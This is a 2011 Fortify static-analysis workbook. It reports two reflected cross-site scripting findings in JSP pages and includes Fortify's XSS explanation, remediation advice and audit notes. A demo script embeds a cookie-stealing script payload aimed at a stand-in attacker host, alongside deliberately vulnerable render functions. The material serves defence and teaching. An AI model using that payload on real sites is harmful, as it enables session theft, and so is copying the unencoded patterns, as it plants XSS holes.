Developer Workbook 2010TW

Aug 19, 2011

Administrator

Report date: Aug 19, 2011; scan machine: VM-Fortify1; Build ID: Dms0819
Files: 1894; lines of code: 222921

Issues by Folder
[Chart. Folder labels as extracted: Critical, Medium, Impact, Low; issue counts as extracted: 2, 0, 61, 1315]


Issues by Category (refined by Fortify priority order: Critical)
- Cross-Site Scripting: Reflected

Issues by Category (refined by Fortify priority order: Medium)


Folder: Critical
Category: Cross-Site Scripting: Reflected (2 Issues)
[Chart: Number of Issues (0 to 2) by Analysis status: <Unaudited>, Not an Issue, Reliability Issue, Bad Practice, Suspicious, Exploitable]
Abstract:
Sending unvalidated data to a web browser can result in the browser executing malicious code.

Explanation:
Cross-site scripting (XSS) vulnerabilities occur when:
1. Data enters a web application through an untrusted source. In the case of reflected XSS, the untrusted source is typically a web request, while in the case of persisted (also known as stored) XSS it is typically a database or other back-end data store.
2. The data is included in dynamic content that is sent to a web user without being validated.

The malicious content sent to the web browser often takes the form of a segment of JavaScript, but may also include HTML, Flash or any other type of code that the browser may execute. The variety of attacks based on XSS is almost limitless, but they commonly include transmitting private data such as cookies or other session information to the attacker, redirecting the victim to web content controlled by the attacker, or performing other malicious operations on the user's machine under the guise of the vulnerable site.

Example 1: The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user.

    <%-- eid is taken from the request and written to the response unencoded --%>
    <% String eid = request.getParameter("eid"); %>
    ...
    Employee ID: <%= eid %>

The code in this example operates correctly if eid contains only standard alphanumeric text. If eid has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response.

Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers. This mechanism of exploiting vulnerable web applications is known as Reflected XSS.

Example 2: The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name.

    <%...
    Statement stmt = conn.createStatement();
    ResultSet rs = stmt.executeQuery("select * from emp where id="+eid);
    if (rs != null) {
    rs.next();
    String name = rs.getString("name");
    %>
    <%-- name comes from the database, which may itself hold user-supplied data --%>
    Employee Name: <%= name %>

As in Example 1, this code functions correctly when the values of name are well-behaved, but it does nothing to prevent exploits if they are not. Again, this code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser. This type of exploit, known as Persistent (or Stored) XSS, is particularly insidious because the indirection caused by the data store makes it more difficult to identify the threat and increases the possibility that the attack will affect multiple users. XSS got its start in this form with web sites that offered a "guestbook" to visitors. Attackers would include JavaScript in their guestbook entries, and all subsequent visitors to the guestbook page would execute the malicious code.

As the examples demonstrate, XSS vulnerabilities are caused by code that includes unvalidated data in an HTTP response. The following vectors bring an XSS attack to a victim:
- As in Example 1, data is read directly from the HTTP request and reflected back in the HTTP response. Reflected XSS exploits occur when an attacker causes a user to supply dangerous content to a vulnerable web application, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces victims to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the user, the content is executed and proceeds to transfer private information, such as cookies that may include session information, from the user's machine to the attacker, or to perform other nefarious activities.
- As in Example 2, the application stores dangerous data in a database or other trusted data store. The dangerous data is subsequently read back into the application and included in dynamic content. Persistent XSS exploits occur when an attacker injects dangerous content into a data store that is later read and included in dynamic content.
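The two data paths above, simulated end to end as an added example (Node.js code written for this page, not Fortify's own; the request stub, the in-memory guestbook standing in for the database, and the payload are all constructed here, and the attacker hostname is a placeholder). It shows why input validation on eid alone is not enough: the guestbook entry enters through a different route, and only encoding at the output catches both.

```javascript
'use strict';

// Constructed attacker payload: ships the session cookie to an attacker host.
const PAYLOAD =
  '<script>new Image().src="http://attacker.invalid/?c="+document.cookie</script>';

// Minimal stand-in for HttpServletRequest.getParameter(); constructed here.
function makeRequest(params) {
  return { getParameter: (name) => params[name] };
}

// Example 1 (reflected): eid is written straight into the response.
function renderEmployeeIdVulnerable(request) {
  const eid = request.getParameter('eid');
  return `Employee ID: ${eid}`;
}

// Example 2 (stored): the database is replaced by an in-memory guestbook.
// Entries arrive through a different entry point than the page that shows them.
const guestbook = [];
function postGuestbookEntry(text) {
  guestbook.push(text);
}
function renderGuestbookVulnerable() {
  return guestbook.map((entry) => `<p>${entry}</p>`).join('\n');
}

// Input validation (whitelist): an employee ID is alphanumeric only.
function isValidEid(eid) {
  return typeof eid === 'string' && /^[A-Za-z0-9]{1,32}$/.test(eid);
}

// Output encoding for HTML element content: the characters the browser
// treats as special ("&" first, so entities are not double-encoded).
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Hardened Example 1: reject what the whitelist does not allow, and still
// encode on output so a later relaxation of the whitelist cannot reopen the hole.
function renderEmployeeIdHardened(request) {
  const eid = request.getParameter('eid');
  if (!isValidEid(eid)) {
    return 'Employee ID: (invalid)';
  }
  return `Employee ID: ${escapeHtml(eid)}`;
}

// Hardened Example 2: the store is not trusted; every entry is encoded as it
// leaves the application, whatever route it came in by.
function renderGuestbookHardened() {
  return guestbook.map((entry) => `<p>${escapeHtml(entry)}</p>`).join('\n');
}

// Run both paths with the same payload and return the four renderings.
function demo() {
  const request = makeRequest({ eid: PAYLOAD });
  postGuestbookEntry('Nice site!');
  postGuestbookEntry(PAYLOAD);
  return {
    reflectedVulnerable: renderEmployeeIdVulnerable(request),
    reflectedHardened: renderEmployeeIdHardened(request),
    storedVulnerable: renderGuestbookVulnerable(),
    storedHardened: renderGuestbookHardened(),
  };
}
```

Calling demo() returns the four renderings: both vulnerable outputs carry the raw `<script>` tag, the hardened reflected path rejects the value at the whitelist, and the hardened stored path still shows the entry but as `&lt;script&gt;`, which the browser displays rather than runs. In the JSP of Example 1 and Example 2 the equivalent of escapeHtml is the output-encoding taglib (for instance `<c:out>`, which encodes by default).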

Recommendations:
The solution to XSS is to ensure that validation occurs in the correct places and checks are made for the correct properties.

Since XSS vulnerabilities occur when an application includes malicious data in its output, one logical approach is to validate data immediately before it leaves the application. However, because web applications often have complex and intricate code for generating dynamic content, this method is prone to errors of omission (missing validation). An effective way to mitigate this risk is to also apply input validation for XSS.

Web applications must validate their input to prevent other vulnerabilities, such as SQL injection, so augmenting an application's existing input validation mechanism to include checks for XSS is generally relatively easy. Despite its value, input validation for XSS does not take the place of rigorous output validation. An application may accept input through a shared data store or other trusted source, and that data store may accept input from sources that do not perform adequate input validation. Therefore, the application cannot implicitly rely on the safety of this or any other data. This means the best way to prevent XSS vulnerabilities is to validate everything that enters the application and everything that leaves the application destined for the user.

The most secure approach to validation for XSS is to create a whitelist of safe characters that are allowed to appear in HTTP content and accept input composed exclusively of characters in the approved set. For example, a valid username might only include alphanumeric characters, or a phone number might only include digits 0-9. However, this solution is often infeasible in web applications because many characters that have special meaning to the browser should still be considered valid input once they are encoded, such as a web design bulletin board that must accept HTML fragments from its users.

A more flexible, but less secure, approach is known as blacklisting, which selectively rejects or escapes potentially dangerous characters before using the input. In order to form such a list, you first need to understand the set of characters that hold special meaning for web browsers. Although the HTML standard defines which characters have special meaning, many web browsers try to correct common mistakes in HTML and may treat other characters as special in certain contexts, which is why blacklists are not encouraged as a means to prevent XSS. The CERT(R) Coordination Center at the Software Engineering Institute at Carnegie Mellon University [1] provides the following details about special characters in various contexts:

In the content of a block-level element (in the middle of a paragraph of text):
- "<" is special because it introduces a tag.
- "&" is special because it introduces a character entity.
- ">" is special because some browsers treat it as special, on the assumption that the author of the page intended to include an opening "<" but omitted it in error.

The following principles apply to attribute values:
- In attribute values enclosed with double quotes, the double quotes are special because they mark the end of the attribute value.
- In attribute values enclosed with single quotes, the single quotes are special because they mark the end of the attribute value.
- In attribute values without any quotes, white-space characters, such as space and tab, are special.
- "&" is special when used with certain attributes, because it introduces a character entity.

For example, when URLs are used in attribute values, the following principles apply:
- Space, tab, and new line are special because they mark the end of the URL.
- "&" is special because it either introduces a character entity or separates CGI parameters.
- Non-ASCII characters (that is, everything above 128 in the ISO-8859-1 encoding) are not allowed in URLs, so they are considered special in this context.
- The "%" symbol must be filtered from input anywhere parameters encoded with HTTP escape sequences are decoded by server-side code. For example, "%" must be filtered if input such as "%68%65%6C%6C%6F" becomes "hello" when it appears on the web page in question.

Within the body of a <SCRIPT> </SCRIPT> element:
- Semicolons, parentheses, curly braces, and new line characters should be filtered in situations where text could be inserted directly into a pre-existing script tag.

Server-side scripts:
- Server-side scripts that convert any exclamation characters (!) in input to double-quote characters (") on output might require additional filtering.

Other possibilities:
- If an attacker submits a request in UTF-7, the special character "<" appears as "+ADw-" and may bypass filtering. If the output is included in a page that does not explicitly specify an encoding format, then some browsers try to identify the encoding from the content (in this case, UTF-7).

Once you identify the correct points in an application to perform validation for XSS attacks and which special characters the validation should consider, the next challenge is to decide how your validation handles special characters. If the special characters should not be considered valid input to the application, then you can reject any input that contains special characters as invalid. A second option is to remove special characters by filtering. However, filtering has the side effect of changing the visual representation of the filtered content and may be unacceptable where the integrity of the input must be preserved for display.

If input containing special characters must be accepted and displayed accurately, validation must encode the special characters to remove their significance. A complete list of ISO 8859-1 encoded values for special characters is provided as part of the official HTML specification [2].

Many application servers attempt to limit an application's exposure to cross-site scripting vulnerabilities by providing implementations of the functions that set specific HTTP response content, which validate the characters essential to a cross-site scripting attack. Do not rely on the server running your application to make it secure. When an application is developed there are no guarantees about which application servers it will run on during its lifetime, and as standards and known exploits evolve there is no guarantee that application servers will stay in sync.

Tips:
- Fortify Source Code Analysis Suite (XSS)
- Audit Workbench
- Fortify RTA adds protection against this category.

header.jsp, line 7 (Cross-Site Scripting: Reflected)

Fortify Priority: Critical
Folder: Critical
Kingdom: Input Validation and Representation
Abstract: The method _jspService() in header.jsp sends unvalidated data to a web browser on line 7, which can result in the browser executing malicious code.
Source: header.jsp:7 javax.servlet.http.HttpServletRequest.getRemoteUser()
Sink: header.jsp:7 java.io.Writer.write()

Lines 5-9 (source and sink are on the same line):

    <c:set var="now" value="<%=new java.util.Date()%>"></c:set>

    <div class="accountText right">
    Login ID: <c:out value="${ pageContext.request.remoteUser }"/><br /> Date: <fmt:formatDate value="${ now }"
    type="date" timeStyle="long" dateStyle="long" />
    </div>
    <!--<div class="link right">

Audit note: the flagged value passes through `<c:out>`, which encodes <, >, &, ' and " by default (escapeXml="true"). Before marking this issue, confirm that the write on line 7 is the `<c:out>` output and that escapeXml has not been set to false; with default JSTL behaviour the remote user name is encoded for the HTML element context it is written into.

GlobalMonitorobjectList.jsp, line 63 (Cross-Site Scripting: Reflected)

Fortify Priority: Critical
Folder: Critical
Kingdom: Input Validation and Representation
Abstract: The method _jspService() in GlobalMonitorobjectList.jsp sends unvalidated data to a web browser on line 63, which can result in the browser executing malicious code.
Source: GlobalMonitorobjectList.jsp:63 javax.servlet.ServletRequest.getParameter()
Sink: GlobalMonitorobjectList.jsp:63 java.io.Writer.write()

Lines 61-65 (source and sink are on the same line):

    <c:if test="${not empty param.domainSerial && domainSerial != 1}">
    <s:url action="DomainEdit_selectByKey" id="pkey">
    <s:param name="vo.domainSerial"><c:out value="${param.domainSerial}" /></s:param>
    </s:url>
    <a href="${pkey}">

Audit note: here the request parameter does not end up in element text but in a URL parameter that is then written into an href attribute on line 65. `<c:out>` applies HTML encoding, which is the wrong encoder for a URL parameter ("&", white space and "%" are left as they are). Check what encoding `<s:url>` applies to `<s:param>` values and whether `${pkey}` is encoded for the attribute context before deciding on this issue; a whitelist check that domainSerial is numeric, applied before it is used, would remove the question entirely.

Folder: Medium
